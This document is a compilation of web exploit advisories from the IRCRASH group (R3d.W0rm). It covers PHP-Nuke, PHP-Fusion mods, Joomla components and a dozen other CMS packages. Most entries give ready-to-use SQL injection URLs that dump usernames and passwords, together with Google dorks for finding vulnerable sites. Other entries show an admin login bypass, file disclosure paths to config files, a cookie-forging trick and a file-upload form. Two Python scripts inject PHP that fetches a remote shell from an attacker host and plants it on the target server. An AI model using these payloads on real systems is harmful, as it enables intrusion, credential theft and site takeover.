Bugs Online v2.14 Sql Injection
# Bugs Online v2.14 Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # # # # #Download : http://sourceforge.net/project/showfiles.php?group_id=42528 # # # #Dork : ext:asp Welcome to bugs online # # # # # [Bug] # # # #http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1 # # ## TNX GOD ##
PHP-Nuke 8.0 Downloads Blind Sql Injection
# PHP-Nuke 8.0 Downloads Blind Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # # # # #Download : http://phpnuke.org # # # #Dork : inurl:modules.php?name=Downloads PHP-Nuke # # # # # [Bug] # # # #Admin Username : http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Admin Password : http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F* #Users Username : http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* #Users Password : http://[site]/[path]/modules.php?name=Downloadsd_op=Addtitle=1description=1email=attac...@devil.neturl=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F* # # # # [Note] # # # #1. magic_quotes_gpc = Off # #2. register_globals = On # #3. For using bug you must login via a simple user. # #4. After using bug go to this url : # #http://[site]/[path]/modules.php?name=Downloadsd_op=Addemail=attac...@devil.nettitle=zzurl=zzdescription=zz #5. I use ascii codes and null byte in url for bypass nuke security function # # please don't change ascii code and %00. # # # ## TNX GOD ##
Asp-project Cookie Handling
# Asp-project Cookie Handling # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://ircrash.com # #My Official WebSite : http://r3dw0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # # # # #Download : http://www.sourceforge.net/projects/asp-project # # # #Dork : :( # # # # # [Bug] # # # #javascript:document.cookie = crypt=1; path=/; # # # ## TNX GOD ##
PHP-Fusion Mod Members Bewerb Sql Injection
# PHP-Fusion Mod Members Bewerb Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # #Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=204 # # #Dork : :( # # # # # [Bug] # # # #http://Site/[path]/members.php?sortby=%'%20union%20select%200,user_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20fusion_users/* # # #You must login then use bug . # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
PHP-Fusion Mod E-Cart Sql Injection
# PHP-Fusion Mod E-Cart Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # #Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=281 # # #Dork : inurl:/infusions/e_cart # # # # # [Bug] # # # #Username : http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_name,1,2%20from%20fusion_users/* # # #Password : http://Site/[path]/infusions/e_cart/items.php?CA=-'%20union%20select%20user_password,1,2%20from%20fusion_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Madrese-Portal Sql Injection
# Madrese-Portal Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # #Download : http://dl.p30vel.ir/scripts/Madrese-Portal-Asp-Eh3an.p-(www.p30vel.ir).rar # # #Dork : Design By ASD Tasarim # # # # # [Bug] # # # #Username : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1 # # #Password : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Mavi Emlak Sql Injection
# Mavi Emlak Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # #Download : http://dl.p30vel.ir/scripts/Asp-Amlak-Best-Pro-Eh3an.p-(www.p30vel.ir).rar # # #Dork : © 2004 Copyright by Mavi Emlak Danismanligi # # # # # [Bug] # # # #http://Site/[path]/newDetail.asp?haberNo=-%20union%20select%200,username,password,3,4,5%20from%20Danismanlar # # #Admin panel : http://Site/[path]/yonet # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
PHP-Fusion Mod TI - Blog System Sql Injection
# PHP-Fusion Mod TI - Blog System Sql Injection # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # #Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=viewid=157 # # # # [Bug] # # # #http://Site/[path]/blog.php?page=blog_idid=-'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
ASP-CMS v.1.0 Sql Injection/Database Disclosure
# ASP-CMS v.1.0 Sql Injection/Database Disclosure # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip # # #DORK : :( # # # # # [Sql Injection] # # # #Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS # # #Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS # # # # [Database Disclosure] # # # #http://Site/[path]/mdb-database/ASP-CMS_v100.mdb # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Joomla Component GameQ
# Joomla Component GameQ # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : http://joomlacode.org/gf/project/gameq # # # #DORK : inurl:option=com_gameq # # # # # [Bug] # # # #http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Joomla Component mydyngallery
# Joomla Component mydyngallery # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : http://mydyngallery.mon-cottenchy.fr # # # #DORK : inurl:option=com_mydyngallery # # # # # [Bug] # # # #http://Site/[joomla_path]/index.php?option=com_mydyngallerydirectory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
boastMachine v3.1 Remote Sql Injection
# boastMachine v3.1 Remote Sql Injection # # # #AUTHOR : R3d.W0rm (Sina Yazdanmehr) # #Discovered by : R3d.W0rm (Sina Yazdanmehr) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : www.boastology.com # # # #DORK : Powered by boastMachine v3.1 # # # # # [Bug] # # # #http://Site/[path]/mail.php?action=R3d.W0rmblog=1id=-9'+union+select+0,1,concat_ws(0x7c,user_login,user_pass),3+from+bmc_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Arab Portal v2.1 Remote File Disclosure (Win32)
# Arab Portal v2.1 Remote File Disclosure (Win32) # # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : R3d.W0rm (Sina Yazdanmehr) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : www.arabportal.net # # # #DORK : Powered by: Arab Portal inurl:mod.php?mod=html # # # # # [Bug] # # # #http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\File.Type # # # #Config File : # #http://Site/[path]/mod.php?mod=htmlmodfile=showfile=..\..\..\admin\conf.php # # # #Note : This bug only work on windows servers . # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
minb Remote Code Execution Exploit
#!/usr/bin/python
#
minb Remote Code Execution Exploit
#
#
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Our Site : Http://IRCRASH.COM
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#
#
#
#Site : http://minb.sf.net
#
#
#
#Download :
http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2#
#
#
#DORK : Powered by minb
#
#
#
#
# [Note]
#
#
#
#All php file in this cms have this bug ;)
#
#
#
#
# Site : Http://IRCRASH.COM
#
## TNX GOD
##
import sys,urllib
if len(sys.argv)3 :
print minb Remote code Execution Exploit
print Powered by : R3d.W0rm
print www.IrCrash.com
print Usage : + sys.argv[0] + http://Target/path http://evil/shell.txt;
print Ex. + sys.argv[0] + http://site.com/minb http://r3d.a20.ir/r.txt;
exit()
if 'http://' not in sys.argv[1] :
sys.argv[1]='http://' + sys.argv[1]
if 'http://' not in sys.argv[2] :
sys.argv[2]='http://' + sys.argv[2]
fp='/include/modules/top/1-random_quote.php?parse=r3d.w0rm'
data=urllib.urlencode({'quotes_to_edit':'quotes_to_edit=;$s=fopen(\'' +
sys.argv[2] +
'\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})
urllib.urlopen(sys.argv[1] + fp,data)
urllib.urlopen(sys.argv[1] + fp)
test=urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()
if 'Not Found' not in test :
print Shell Uploaded .
print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'
exit()
Stash v1.0.3 Admin bypass / Remote File Disclosure
# Stash v1.0.3 Admin bypass / Remote File Disclosure # # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # # # #Download : http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz# # # #DORK : :( # # # # #[Admin by pass] # # # #http://Site/[path]/admin/login # #Username : ' or 1=1/* # #Password : R3d.W0rm # # # # #[Remote File Disclosure] # # # #http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x[file name in hex])/* # # #Note : You must enter file name in hex in valun address to download it . # #Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870 # #http://Site/[path]/downloadmp3.php?download=-9'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
munky-bliki lfi
#!user/bin/python
# -*- coding: cp1256 -*-
#
munky-bliki Lfi
#
#
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#
#Our Site : Http://IRCRASH.COM
#
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#
#
#
#Script Download :
http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz
#
#
#DORK : Copyright © 2004 Dovid Kopel
#
#
#
#
# [Bug]
#
#
#
#http://Site/?zone=file.type%00
#
# [Note]
#
#
#
#By this exploit u can create a shell on valun site ;)
#
#
#
#
# Site : Http://IRCRASH.COM
#
## TNX GOD
##
import httplib,urllib
site=raw_input('Site [Ex www.r3d.com]: ')
path=raw_input('Path [Ex /munky]: ')
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')
print [*]Powered by : R3d.W0rm - [EMAIL PROTECTED]
conn=httplib.HTTPConnection(site)
print [*]Connected to + site
print [*]Sending shell code ...
conn.request('GET',path +
/?zone=?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'?php%20include%20\\'
+ shell + \\';?');fclose($fp);?)
print [*]Running shell code ...
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')
print [*]Shell created
print [*] + site + path + '/r3d.w0rm.php'
Ovidentia Sql Injection
Ovidentia Sql Injection # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # #Script Download : www.ovidentia.org # #DORK : Powered by Ovidentia # # [Bug] # #http://Site/index.php?tg=contactidx=modifyitem=-9'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/* # # [Note] # #You must login by a simple user and then use bug ;) # # # Site : Http://IRCRASH.COM ## TNX GOD ##
MyClan Sql Injection
# MyClan Sql Injection # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # #Script Download : www.sourceforge.net/projects/haudenschilt # #DORK : Copyright A© 2005-2006 Battle.net Clan Script 1.5.2 # # # [Bug] # #http://Site/index.php?page=membersshowmember='+union+select+name,1,2,password+from+bcs_members/* #http://Site/index.php?page=boardthread=-+union+select+0,1,password,name,4,5,6,7+from+bcs_members/* # # [Note] # #If you inject and crack admin password you can upload shell in medal pasge in admin panel ;) # # # Site : Http://IRCRASH.COM ## TNX GOD ##
UNAK-CMS Lfi
# # UNAK-CMS Lfi # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # #Script Download : www.unak.net # #DORK : Powered by UNAK-CMS # # # [Lfi] # #http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 # # # Site : Http://IRCRASH.COM ## TNX GOD ##
eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG
# eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG # # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # # # #Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz # # #DORK : :( # # # # #[Sql Injection] # # # #Blind : http://Site/print.php?id=1'+and+1=1/* # #http://Site/style.php?template=1module='+union+select+concat_ws(0x7c,username,pass)+from+users/* #User : http://Site/iframe.php?field=usernamemodule=users/* # #Pass : http://Site/iframe.php?field=passmodule=users/* # # [IG] # #http://Site/admin/phpinfo.php # # # #[Remote File Disclosure] # # # #http://Site/admin/show_img.php?type=text/plainimg=File # #Ex. http://Site/admin/show_img.php?type=text/plainimg=../vars.php [Get database user pass] # # # [Remote File Upload] # #Exploit : # # # #html # #!-- # #Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr)) # #Http://IrCrash.Com # #//-- # #form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data #input type=file name='file_upload' # #input type=hidden name=insert value=1 # #input type=hidden name=s_rc value='file://' # #input type=submit # #/form # #/html # # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
